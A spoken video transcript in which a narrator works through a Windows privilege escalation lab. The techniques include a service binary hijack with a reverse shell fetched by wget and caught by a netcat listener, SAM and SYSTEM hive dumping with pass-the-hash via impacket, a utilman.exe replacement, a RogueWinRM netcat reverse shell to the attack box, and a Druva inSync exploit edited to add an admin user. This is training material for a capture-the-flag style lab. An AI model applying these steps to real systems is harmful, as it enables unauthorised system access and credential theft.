let's build another exe service shell and start a listener on the machine. We will transfer the reverse shell executable and store it in this location. Feel free to use wget transfer to get your executable and move it to the desired location. Remember to grant permissions to everyone to execute the payload, and then you can configure mind the spaces and stop the service and start the service. So do we have it? We do have it. Let's see if it's actually here. It is actually here. And so now I'm going to use wget. Work, very good. It works, excellent. Half the battle is done when this thing allows us to actually type in here. And so we're doing rev service3.exe, and it's going to be output into rev service3.exe. And there is that. Wait. Oh, I didn't have a Python server. That's my bad. So Python 3 m http.server. Okay, there you go. And so now if I just run it one more time, very good, we got it. And this thing did give it out. Very good. So we have our executable. And so now I can go and, where is it? It should be in the users, right? So cdc users THM unprivileged, and we should be here. And if I do a dir, there is number 3, perfect. And so in this particular case, I want to give it permission before doing anything else, right? So we want to give it executable permission. So we're going to do icackles, and I can just do rev service3.exe and give it grant everyone full permission. And there is that. So successfully processed, excellent. So what I got to do is I got to do this part. This is one of the extra parts. So to change the services associated executable and account, we can use the following command, mind the spaces. So we're going to configure the THM service. Binary path is going to be this, and it's going to create as the object is going to be the local system. So that's very important. So I guess I can do it from the root folder since we're doing it over here. So scconfig thm service bin path is going to equal, and make sure there's a space there, and it's going to equal users thm unprivileged rev service 3.exe, and the quotes, space object equals space local system. And we got a success message for this one as well. And so since we have that, we are going to now go here. We're gonna exit out of our, or Control C, my bad, Control C, and it gets out of there. And so now I'm gonna do a netcat listener LVP 444 6 or 7. What is it? Where are we on? 7. 4447. Netcat listener on port 4447. And come back here and do sc stop thm service. And it hasn't even been started, so fine. So thm service. Okay, so now it's running. And I do have my reverse shell. Hey, look at that. We got it, you guys. This is exciting. So what we want to do now, who am I? I am the system, baby. We want to go to here, and actually we want to go inside users and do a dir, and we see that there's an administrator. So let's go into the administrator and do a dir, and there's their desktop, and do a dir, and there is a flag right there, flag.txt. Insecure service configuration, we got it. Voila. Ladies and gentlemen, this one was kind of a longer task, but we got it. We got it, baby. We got it. So I'm excited about this one. We finished this one. This is a very long one as I scroll back. Okay, so now we're going to move on. Okay, so in this particular exercise, which is abusing dangerous privileges, we started a new machine, and we're going to RDP, remote desktop, into the machine. They don't give us the on-screen split screen. And so I'm going to show you what that looks like in a second. And we're going to take advantage of SE backup and SE restore. And the whole idea here is abusing the privileges of the user and to see what the privileges of that person are. There's a complete list of Windows privileges that are available. What we want are the ones that actually allow us to escalate in the system. And so SE backup, SE restore. What else do we got over here? SE take ownership. And what else do we got? SE impersonate. And I think that's it. So whichever one allows us to get the flag, I feel like that's the one that I should do, because that's the one specific to this exercise. Yeah, so this thing, pass the hash, who are my authority system. So I kind of want to do all of them, but at the same time, I don't know if we should do all of them. So this is, let's see real quick. Let's see what we got over here. Okay, so it basically says that we can use any of the 3 methods that are in this task to gain access to the admin desktop, and we can get the flag accordingly. So there's only one flag, and there's 3 exercises that we can do. So why not try to do all 3, right? So first and foremost, we need to gain RDP into the machine, which has this IP address. So first we are going to do that. Okay, so inside our Linux machine, it's basically the most reliable one that I've found is xfreeRDP. And you do U for the username, which was what exactly? It's THM backup. And then password is copymaster555. Okay, so THM backup. And then you do P for the password, which is copymaster555, and then V for the, I guess, virtualize, or I don't know what that stands for specifically. but we're going to paste the IP address over here, and that should work. And yes. Okay, there we go, we got it. And so it brings up the machine for us over here. I'm just going to move this to the side so that we can kind of have some room. And so it'll bring up the machine, right? And so this is part one of what we're trying to do. And then now we need to do a couple of things, right? So the account is part of the backup operators group, which by default is granted the SE backup and SE restore privileges. We'll need to open a command prompt using open as administrator option to see these privileges, and we'll be asked to input our password again to get an elevated console. So we're gonna pull up command prompt, we're gonna right click on it and do run as administrator, and it should give us some privileges here. So let's see if that actually works, right? So we're here, gonna go here, and I want cmd.exe. Right click on it, run as administrator, and it's going to ask me for the password again, so copy master 555. Alright, so we got the admin privilege, right? So who am I priv should give me all of my privileges here. And so privilege name SE backup has been disabled, SE change notify privilege is enabled, SE restore files, all of these things have been disabled with the exception of the notify privilege, which is interesting because I thought I would have permission to the other ones. Oh no, it does say it over here that we also don't have permission to these things right here. So the only thing that we do have is change notification. So to back up the SAM and system hashes, we can use the following commands, which is these things right here, and I will use them. Then it's going to create a couple of files for us, which are with the registry hives. We can now copy these files to our attacker machine using SMB or other available methods. For SMB, we can use the impackets SMB Python file to start a simple SMB server with a network share in the current directory of the attack box. So we would create make share or make a directory called share, and then you run the script smb2 support username, which is going to be backup, password is copymaster, and then we're going to put it inside the new share folder that we just created. This is going to create a share named public pointing to that directory, which requires the username and password of the current Windows session. After that, we can use the copy command in our Windows machine to transfer them to the attack box. So it'll be like so. And then you're going to use the impackets to retrieve the user's password hashes. So once we've actually created the other thing, we're going to run secrets dump, which I think is it's a different thing. So we're going to run secrets dump, and then we're going to use the basic options basically to do the thing, and then we're going to get the hashes. These are the password hashes for administrator and guest. And so since we have the administrator's hash, we can perform a pass the hash attack to gain access to the target machine with system privileges. And so then we're going to use the psexec Python file, and we're going to pass this hash to it, and then administrator at the IP address of the machine, and we should be able to gain system access. And so from that, we should be able to gain our flag. So let's run it from the top. So far we're here. So we need to do reg save hklm. And so what I'm going to do to make this a little bit easier, I'm just going to open this up in a different window here, just so I can look at it on a different screen and easily be able to type this whole thing up. So let's go into, all right, so first thing we got to do is we got to go to the root folder, and we're going to do reg save hklm system, and it's going to be inside the users thm backup and system.hive. So that's the first one. Cool, the operation completed, and now this is the next one. So hklm sam, and same thing, we're going to save it to the same place. Cool, that one completed as well. So now what I gotta do is I gotta create a share using the Python file. So I'm not going to, I'm just gonna kind of shrink this down, because if I close this one, it's going to end our RDP session. So we're just gonna shrink that down, and we're gonna open up a new terminal for ourselves. And with this, we're gonna run the share Python whatever. So Python 3.9 is what we're running, and it's opt packet examples smb examples / smb server.py, and smb2 support is what we're going to be doing. Username is thm backup, and the password is copy master 555, and we're gonna do a public share. Okay, I think it worked. It didn't give me any final message, but I think it's like the Python server where it kind of just stays open like that. So what I'm gonna do is I'm gonna go back inside the command prompt here, and I'm just going to copy what we want to copy. So copy the stuff that we made. So thm backup sam.hive, and we're going to send it to the attack box IP, which is 10. What's going on? Why aren't you typing? Don't tell me, bro. Okay, so find 10, 10, 155, 173, and it's going to be in public. Oh, there you go. Yep. So it did work. Great. So now we're going to do the next one. And there you go. We got the next one too. So we got both of them. So right here, both of these have been copied, and this is what it looks like inside our share folder. And so based on the instructions, there you go, closing down connection. So it was done. Very good. And so since we have that, now we're going to run a different command. I think I can probably close this share. So I'm going to be able to run a different command inside terminal to pull out the hashes. There we go. That's what we're doing. So the next one is we're going to run a different command to pull out the hashes. So I think I could probably do exit. Oh no, bruh, that's not what I wanted to do. Wrong one. I was typing in the wrong window. I need cmd.exe to come back, please. And we're going to run it as administrator, and it's copy master 555. There's that. Okay, great. Hopefully everything that I've done so far will not go to waste, because that would really suck. Or Control C, I guess. There you go. That ends that. Okay, so do we have a public share or something? Where's the thing that I just made? So it's inside the share folder. Yeah, okay, there they are. Okay, great. So now, what we got to do is we got to pull out the hashes for administrator and everybody else. So this is the command. So it's Python 3.9 opt packet examples secrets dump.py, and then sam.hive. That's the one that we're going to be messing with, and then system.hive, and it's all local, and that is case sensitive, and I believe that's it. And then so after this I press enter. Okay, so the first time that I ran it, I was inside the root folder. I was not inside the share folder, and it gave me an error message. So just so you know, we need to be inside the share folder in order for this command to work. And so it did work. And so, I mean, we got a bunch of hashes. The one that specifically we're looking for is the administrator hash, which goes from all the way to, let's see, which one is it? So from what I understand, it is this entire section, not including the last several colons. So it starts from right after the 500. So administrator, you have 500, and there's a colon. And then this section, including this colon, goes all the way over here. And that is the hash that we are going to try and decode. So copy that. And so the next one that we're going to end up running is the script from impacket for psexec hashes. So Python 3.9 opt impacket examples psexec.py hashes, and then paste this thing, and then we're gonna do administrator at the IP address, which is 10.4.64. Look at that, it worked. Oh my gosh. So who am I? I am the system, mofo. What up? What up? Okay, so now let's go to the, I think we're supposed to go to the users, right? And do that. And there's an administrator here. And cd desktop. And do that. And there's a flag right here. Okay, so the first exercise worked. And we got the privileges that we needed. So let me see if I can switch my tabs. I don't know what the heck I did that I can't switch back and forth with my tabs. That's kind of annoying. There we go. Now let's go here. I really don't know what button I pressed. I'm kind of annoyed. But I pressed something. And now I can't see my full tabs at the top. And I can't go back and forth. Or can I go back and forth? Oh my god, I can't go back and forth between those to this one. But I can. I gotta figure this out real quick. This is gonna annoy the hell out of me. But okay, that was the flag though. I believe that is the actual flag that we received, which is, yes, privilege. Let's go, let's go, let's go. Okay, so that worked. So the next one is going to be the take ownership. Yeah, we just did backup restore. So the next one is going to be this thing, and we're going to use a different username and password to log in to try to get RDP, and then we're going to run as administrator, we're going to run CMD, and we're going to use the utilman.exe, which is basically what happens is when you go in, when you lock the screen, at the bottom right, there's this little thing right here that when you click on it, it gives you all these extra things right there. So since it's being run with system privileges, we can effectively gain privileges if we replace the original binary for any payload that we want. And so to replace it, we're going to start by taking ownership of it with the following command. So take ownership of this with that command, and then we should have gotten ownership, and then we're going to change the permissions of that to grant this person full permission, which is our current user. After this, we're going to replace the exe with a copy of cmd.exe, which is basically copy cmd.exe into utilman.exe, and then we're going to lock the screen, and then when we click the ease of access button, it'll run with system privileges, and since we replaced it with a CMD copy, we should just get a command prompt, and that's it. That's actually very, very simple to run. So that's going to be the one that we're going to run right now. Okay, so we're done with that previous RDP, so we're going to do a new RDP with the user thm take ownership, and the password is the world is mine 2022, and the system is going to be the same, so 10.10.4.64 10.10.4.64, and that should give me, there we go. Okay, so now we have a new RDP session, and we are now going to go back into our command prompt as an administrator and right click on it, run as admin, and the world is mine 2022. Okay, there we go, we got that. So now the thing that we want to do is we want to check a few things first and foremost with our privileges. So we're going to go into the root folder, we're going to do who am I priv. And I don't think you need to be in the root folder to do this, by the way. I'm doing it because that's how the exercise kind of looks. And so whoami.priv or whoami/priv, it gives us all these things. So this is disabled, but the change notifying privilege is enabled, and that is basically what it all says. So it says we're gonna abuse utilman.exe to escalate privileges. So what that looks like is if I go here and I click this, and I think it's this one, and we're gonna lock the screen. So we lock the screen, and this is the utilman, or no, this is the utilman. Yeah, that's it. So it's this thing right here. It's this little thing at the bottom that I guess looks like a clock or whatever. When you click on that, it brings you these nice little whatevers, helps utilities, right? Utilities and stuff like that. So the world is mine 2022. And I'm back in here. So what I'm trying to do now is I'm going to go ahead and take ownership, first and foremost, of the utilities manager. So take ownership of the file, which is in Windows System 32 util manager exe. And now we have ownership of the file. That's great. So now I'm going to change the permissions of it. System 32 utilman.exe, and I'm going to grant this person, which is who I am, take ownership. I'm going to give them full permissions. There you go. And we got permissions. So now what we're going to do is we're going to go into the Windows System 32 directory. So Windows System 32. And now that we're here, we are going to copy cmd.exe to utilman.exe. That's it. That's all we're doing. Yes, do you want to overwrite it? Yes, I do. And so there you go. That's been copied. Although that wasn't part of the breakdown in the screenshots over here. So hopefully this is going to be fine. And so now all I got to do is I got to go back to the screen. I'm going to lock the screen. And then when I click on this, look at that. We got a new shell. And of course, I am the system, which means that I can go to the C directory and go into users. And over here, there should be, oh my gosh, what's going on? Oh, administrator, there it is. Wow, look at that. This is kind of a weird output, isn't it? But there is an administrator here, so I can go into the administrator and do a dir here, and it's probably going to give me the same thing, which is fine. And I'm going to go into the desktop, do a dir, it's going to give me the same issue, and there's a flag right there. So what we can do is we can do type flag.txt, and there's the flag. And it's the same flag, obviously, but we're just using a different exercise to get the flag. So excellent. Great, great, great. That worked. So now for this one, we don't need a new username and password because we just used the last one and it should be fine here. So this one says, these privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user. Impersonation is easily understood when you think about how an FTP server works. The FTP server must restrict users to only access the files that they should be allowed to see. And so let's assume that we have an FTP service with the user FTP. Without impersonation, if user Ann logs into the server and tries to access her files, the FTP service should try to access them with its access token other than Ann's, right? So Ann is trying to get her stuff, and so she is sending a request, and her access token gets sent over here. The FTP service with the user FTP, which is very similar to like the system user, right? So it's like the system user has access to everything. And so the FTP user is going to go into Ann's files and it's going to retrieve Ann's stuff. So there are several reasons why using FTP's token is not the best idea. For the files to be served correctly, they would need to be accessible to the FTP user. An example, the FTP service would be able to access Ann's files but not Bill's files, as the discretionary access control list in Bill's files doesn't allow the user FTP. This adds complexity as we must manually configure specific permissions for each served file or directory. For the operating system, all files are accessed by the user FTP, independent of which user is currently logged in. This makes it impossible to delegate the authorization to the operating system. Therefore, the FTP service must implement it. If the FTP service were compromised at some point, the attacker would immediately gain access to all of the folders which FTP has access to. So if on the other hand, FTP services user has the SI impersonate or SE impersonate and SE assigned primary token privilege, all of this is simplified a bit, as the FTP service can temporarily grab access token of the user, logging in, and use it to perform any task on their behalf, which is basically what happens. And so in this situation that we saw, FTP user was using the FTP token right here, but in this particular case, the FTP user is using ANS token. So that's important. So now, what we're trying to do, we're going to basically take advantage of that entire thing, and let's kind of skim through this real quick. As an attacker, if we manage to take control of the process with impersonate or assign primary token, we can impersonate any user. So in Windows, you will find that the local service and the network service accounts already have those privileges. Since these accounts are used to spawn services using restricted accounts, it makes sense to allow them to impersonate connecting users if the service needs. So Internet Information Services will also create a similar default account called a IIS app pool or default app pool for web applications. To elevate privileges with those accounts, an attacker needs to either spawn a process that the users can connect and authenticate to for impersonation, or to find a way to force privileged users to connect and authenticate to the spawned malicious process. So we're going to use RogueWinRM exploit to accomplish both of these things. Let's start by assuming that we have already compromised the website running on IIS that we have planted a web shell on, including this thing. So I guess we could just go to the website and we can use the web shell to check if the assigned privileges of the compromised account and confirm that we hold privileges of interest, which would be, so basically it's a web shell that you're gonna treat as a command line interface, and we're just gonna run the whoami privilege, and it's gonna show us what our privileges are. And so it says that the impersonate privilege is enabled in this case, but the assigned primary token is disabled. And so we're gonna use RogueWinRM. First, we need to upload the exploit to the target machine. For the convenience, this has already been done, and it's in the tools folder. And the RogueWinRM exploit is possible because whenever a user, including unprivileged people, start the bits service in Windows, it automatically creates a connection to port 5985 using system privileges. 5985 is typically used for WinRM service, which is simply a port that exposes a PowerShell console to be used remotely through the network. Think of it as SSH, but using PowerShell. So for whatever reason, the WinRM service isn't running on the victim server, and an attacker can start a fake WinRM service on that same port and cache the authentication attempt made by the bits service. If the attacker has SE impersonate privileges, he can execute any command on behalf of the connecting user, which is the system. Before running the exploit, we're going to start a netcat listener, and then we're going to use the web shell to trigger RogueWinRM to use the exploit. And the exploit may take up to 2 minutes to work, so your browser may appear as unresponsive. This happens if you run the exploit multiple times, as it must wait for the bit service to stop before starting again. The bit service will stop automatically after 2 minutes, and the P parameter specifies the executable to be run by the exploit, which is the netcat64 exploit, netcat64 exploit, and the A parameter is used to pass arguments to the executable. Since we want netcat to establish a reverse shell against our attacker machine, the arguments will have to be this. And so that's what we see right here, from what I understand. Yep, that's what it is right here. So once you have that, you should get the reverse shell. So this one also seems fairly simple. We just had to do a little bit of reading to actually make it work. So here we go. Let's run these commands and see what we can do. So the first thing I'm going to close this because I don't think I need that anymore. I do need to go into the Firefox browser and see if I can actually access that website, that HTTP that is running on this. And so I'm gonna minimize this just to kind of give ourselves some room to work here. So HTTP //10.10.464, and this should be a web shell. There we go. So who am I privileges, and it's going to give us all of our privileges as so. And as we saw already, the assign primary is disabled, but impersonate is enabled. Okay, so those are the things that we're going to take advantage of. So the first thing that we got to do is to upload the exploit into the target machine using it's already inside the tools folder, right? So if I do this, if I do cd, it should tell me where I am, which is in this particular case here. And so what I can do is I can do cd / or // and so that should take me to the current folder. Oh, it didn't. So cd do that. Can you take me back? And in this case, where am I? Oh, it's still not doing it. Okay, so I guess I will have to kind of manually do this, huh? So cd c.tools. I just want to see if it works, right? And so now where am I? Still not working. Okay, so fine. So in that case, since I can't go back and I'm just stuck in this little directory that we're in, the first thing that we're going to do is we're going to close this thing, and we're going to create a netcat listener on port 4442. So that's the first piece that they told us to do. And so we're going to create our netcat listener. Actually, I'm going to close it. I'm going to go back one directory, and I'm going to go and do it again. I don't know if this is going to make a difference really, but I just did it based on the root directory. And so now what I'm trying to do here is I'm trying to launch the command that will actually run the transfer of the tool, the WinRM, as well as the netcat64.exe, to be able to transfer that. So that's the whole idea here. So if that is indeed the case, or actually not even transferring it, excuse me, I'm not transferring it. Since I already have the netcat listener running, the only thing that I'm doing is just running the exploit or the executable to make it work. So it's going to be, this is the command. So it's c/tools /rogue winrm, whoops, not tog, rogue winrm /rogue winrm.exe. Okay, so far so good. And then we're going to have as the payload be c tools netcat64.exe. Oh no, I pressed enter. No. Damn it. Is that even working? No, it didn't work because I didn't do the attack box. Shit. So let's see. Let me just refresh the page. That's fine. Refresh the page and give me a blank slate, please. Otherwise, I have to. I'm just going to copy this. Okay, stop. Close. Go here. We're just going to go back to the IP one more time. Okay, there we go. And I accidentally pressed enter, you guys. And that's basically where we ended up at. So So what I need to do after that is do a -a, and then inside the quote, again, we're going to do execute cmd.exe, and we're going to use the attack IP, the attack box IP, on port 4442. That's it. That's all we got to do. And so now, running that, it's going to take, it says, a couple of minutes. Okay, so our attack box crashed. And I was left to my last section. That's actually where I'm supposed to go back to. And this is where we were. Yeah, this is where we were. So I was trying to run the basic command that came here, and I ended up accidentally pressing enter, and I had to restart the whole freaking thing. So now, at the very least, I could probably just do it real quick on the same screen and not have to worry about the rest of that stuff. So we're gonna open that. We're going to create our little netcat listener, and everything should run smoothly. Yay. Okay, here we go. So netcat lvp 4442. That's where we're gonna have our listener. And we're gonna go here, and we're going to load the website, which is on 10.10. What is the IP address of this? 464. So here we are again. Yet again, here we are. And so now I need to type this whole thing, or maybe I can copy paste it and just change the IP address so I don't make a mistake again. Paste that. Excellent. There we go. And now all I need to do is just change the IP address, which is 10.10.144.76. And it said it's going to take a couple of minutes. So listening for connection, very good. This is all good. This is all good. Received packet, all good. Bits triggered. Authority, system. So it seems to be all good. Now we just need to see if we actually get our shell from, oh my god, that was quick. That was instantaneous almost. So who am I? I am indeed the system. And so if that's the case, let's go to C users administrator desktop, and there we are. And there should be a flag here. There it is. So type flag.txt. And there's the flag. So same flag, obviously. So all of that stuff. So far so good. With the exception of the machine crashing on me, it ran pretty smoothly. It was okay. So I'm gonna just close this out and move on to the next one. So let's see what we got here. Okay, so for abusing vulnerable software, we had to start another machine, which is starting up right now. And the whole idea, and so let me see how many flags we need for this one. There's only one flag, and we need to, I think it's one whole exercise. So yeah, it's just one main exercise. The remote desktop is currently unavailable. Why? I just started it. Okay, anyways, there you go. Okay, cool. So the whole idea here is that we're taking unpatched software or vulnerable software and taking advantage of it. So software installed on the target system can present various privilege escalation opportunities. You can use the WMIC rule, or WMIC tool, excuse me, to list software installed on the target system and its versions. The command below will dump information it can gather on installed software, and it might take around a minute to finish because I'm pretty sure there's a lot of stuff that's going to come when we run this, right? So remember that the WMIC product may not return all installed programs. Depending on how some of the programs were installed, they might not get listed here. It's always worth checking desktop shortcuts, available services, or generally any trace that indicates the existence of additional software that might be vulnerable. So once we have gathered product version information, we can always search for existing exploits on the installed software online, like sites ExploitDB, which is great, Packet Storm, or just Google, right? So using WMIC in Google, can you find a known vulnerability on any installed product? So I guess the first thing, I mean, I'm already running, I think at 2, maybe 3 hours for this recording. So I am not going to do this. I'm not going to do live research on this, but I would recommend that you do. So if you have a Windows machine, feel free to run this command on there and then see what software show up. And then using exploit database, packet storm, or just Google, you can say, hey, what vulnerabilities exist for such and such software? So you can find it that way. So in this particular case study, we're going to be doing Druva InSync version 6.6.3. And the server is running this, which is in vulnerable privilege escalation as reported by Matteo Malvica. The vulnerability results from a bad patch applied over another vulnerability for version 6.5. And the software is vulnerable because it runs the remote procedure call, the remote, basically remote desktop server on port 6064 with system privileges. That's the big catch right there. Accessible from localhost only. If you aren't familiar with this, it's simply a mechanism that allows a given process to expose functions called procedures in lingo over the network so that the other machines can call them remotely, right? So in case of Druva, one of the procedures exposed for procedure number 5 on port 6064 allowed anyone to request the execution of any command. Since the RPC server runs as a system, any command gets executed with system privileges. The original vulnerability reported on 6.5 and prior allowed any command to be run without restrictions. The original idea behind this was to remotely execute some specific binaries provided with InSync rather than any command. So no check was made to make sure of that. A patch was issued where they decided to check that the executed command started with the string this were allowed, where the allowed binaries were was supposed to be, but then this proved insufficient since you could simply make a path traversal attack to bypass this kind of rule. Okay, suppose that you want to execute cmd.exe, which is not allowed in the path. You could simply ask the server to run this and then do ... and then Windows cmd.exe, and that would bypass the check successfully. This is path traversal is what they're implying here. So to put together a working exploit, we need to understand how to talk to port 6064. Luckily for us, the protocol in use is straightforward, and the packets to be sent are depicted in the following diagram. So you're the attacker. First, you send a hello packet, which looks like that. Then you send the remote procedure ID, then the command length, and then the command string. And it all goes to the RPC server on port 6064. The first packet is simply hello. The second packet indicates that we want to execute procedure number 5, which is the XID, as this is a vulnerable procedure. And the last two packets are used to send the length of the command and the command string to be executed. Initially published by Matteo, the following exploit can be used in the target machine to elevate privileges and retrieve this task's flag. For your convenience, this is the original exploit code, and you can pop a PowerShell console and paste the exploit directly to execute it. This is also available in the target machine at the TXT inside tools. Note that the exploit default payload specified in the CMD variable will create a user named PWND, so pwned is technically what that means, in the system, but won't assign him administrative privileges. So we will probably want to change the payload for something more useful. For this room, we're going to change the payload and run the following command. So it is for here, net user pwned add. So what we're going to change that to is net user this whole thing, and then it's going to create a user pwned with a password of simple pass and add it to the administrator group. If the exploit was successful, you should be able to run the following command to verify that the user exists, which is net user pwned, and it will say yes, and then the local group permissions would be administrators, and you can run the command prompt as an administrator and get the flag. So let's do it and let's see if it actually works, right? So since it's inside the tools folder and I need to change the command in there. So first I'm going to go here. I'm going to open the command.exe, and I'm going to open File Explorer so I can go find this inside our tools directory, which is this PC, and then what is it? C tools. So C tools, and it is this thing, right? Druva. Yep, this is it. So we're going to open this, and we need to change the variable value right here to read the net user pwned, and then I'm going to actually just modify the end of it. So the password is going to be simple pass 123. Then I'm going to do add and net local group is administrators pwned add. That's it. Easy enough. So we just added a password here. So net user pwned simple pass add and net local group administrators add pwned to that, and that's it. And so we're going to close this. We are going to save it. Okay, let's make sure that we do this quickly, and we're just going to save it and overwrite it. Yes, overwrite it. You don't have permission to open this file. To obtain permission. Fine. So I'm going to save it as this. I'll just create a new one. God, you're so annoying. Okay, so there we go. So now we have the exploit, and it's being operating exactly what we want it to operate. So then if I go to command line and check for that user, let's go to the root directory and do net user pnw. Oh, excuse me, I'm supposed to use PowerShell first to run it. My bad. So first we're going to open this up, and we're going to open up PowerShell, and then we're going to go here, and we're going to take this, and we're going to select all. Do I even need the, I don't, I just need from this point. I don't need the comments. So I just need this point, and I'm going to copy this, go to PowerShell, and we are going to paste it. Doesn't matter where I am. Let's just go to the root folder just in case. And there you go, pasted that, enter, and should be fine now. So now let me go here and check for the existence of this user, and there it is. So the user does exist, and they belong to the local group administrators, and so on and so forth. So we have that now. So now what we can do is we can run as the administrator, right? You can run the command prompt as an admin and just use their username and password. So we're going to go back to here. We're going to do cmd.exe and run it as an admin. It's going to ask for us to log in, more choices, pwned. There you go. And the password was, what was it? Simple pass something something something. Simple pass 123. Simple pass 123. And I am now logged in as pwned, which is an admin, and now I have access to the Windows System 32. So we got to do cd and then go to users. Just go here for now, and let's do a dir, and we have an administrator. So administrator, whoops, cd administrator, and then cd desktop. And where's the flag? There it is. So type flag.txt, and there we go. We got it. We got it. Exciting, exciting, exciting. And there's the flag. So good stuff. We got it, and it was fun, and it was easy, and it was quick. So moving on. All right, so tools of the trade here. So we have WinPeas, which is these are just a couple of scripts that allow you to enumerate better. WinPeas is a script developed to enumerate the target system to uncover privilege escalation paths. you can find more information about WinPs and download either the precompiled executable or a bat script, and it'll run commands similar to the ones listed in the previous task and print their output. And the outputs can be lengthy, so you want to put it into an output file like so. And that way you can enumerate the machine that you're on just to see what you can use and how you can traverse that machine so you can get escalated privileges. Then you have PrivEscCheck, which is a PowerShell script that searches common privilege escalation on the target system. It provides alternates to WinPs without requiring the execution of a binary file, and you could just download that here. And to run it, you may need to bypass the execution policy restrictions to achieve this. And you can use the set execution policy cmdlet or commandlet as shown below. So you'll set the execution policy, bypass, and then scope, process, force, so on and so forth. And then you will actually run privilege escalation and see what's up. And then you have the Windows exploit suggester, the next generation. And some exploits suggesting scripts such as WinPs will require you to upload them to the target system and run them. This may cause AntiVirus software, which most likely does happen. To avoid making unnecessary noise that can attract attention, you may prefer to use the new version of this, which will run on your attacking machine. And you can run that, it's a Python script basically. And first you want to update it to make sure that everything's all good and update the command, the update database. And what's going to happen, you will need to run the systeminfo.txt command on the target system. Don't forget to direct the output to a .txt file, and that's basically what it looks like right here, but they didn't put the output command. And so of course, the last but not least is Metasploit, which can run a lot of great things, which we've already done in this specific room. We actually did MSF console and we created a bunch of payloads for reverse shells, and MSF console is a part of Metasploit. So if you already have it, if you already have the shell on the target system, you can use the local exploit suggester module to list vulnerabilities that may affect the target system and allow you to elevate your privileges on the target. So instead of doing all the other things that we did when we got the shell, I mean, the shells that we got were admin privilege shells anyways, but if you have a lower privilege shell using Metasploit, you can just simply run this, which is one of the inherent payloads that comes within Metasploit. You can just run that and it will give you what all the vulnerabilities are that can allow you to elevate your privileges. So hacking can be super easy if you know how to use these tools. All right, so here is the conclusion. In this room, we learned a bunch of things. These techniques should provide you with a solid background on the most common paths attackers take to elevate privilege on a system. Should you be interested in learning about additional techniques, we have all of these other rooms, which are super freaking exciting. And I don't think I've done any of these because I've done most of the beginner stuff. So super excited to actually be able to run all of that. And yeah, that's pretty much it for this room. So I hope you learned a lot. This was a nice refresher for me. I really enjoyed going through it. And this was one of these subscriber-only rooms. So you do need a VIP subscription, so to speak, or basically a paid subscription to go through this room. And you can either do it yourself through your own cost, or you're more than welcome to use the link in the description below to get yourself a discount of $5. So it's $12 to start. You can get the $5 towards it, so it'll be $7. And it's super easy to get, super affordable. If you don't want to do that, if you just want to use your own Windows machine or your own Linux machine to do that, you're more than welcome to. And all you got to do is just follow along as we go through the rest of these rooms and these paths. So make sure you like, subscribe, share, and turn on the notification bell so that you get notified the next time a video comes out. And that's pretty much it. So if no one else loves you, Hank loves you. It's your boy Hank Hackerson at Hank Hacks Hackers. And peace, love, and chicken grease. I will see you in the next video.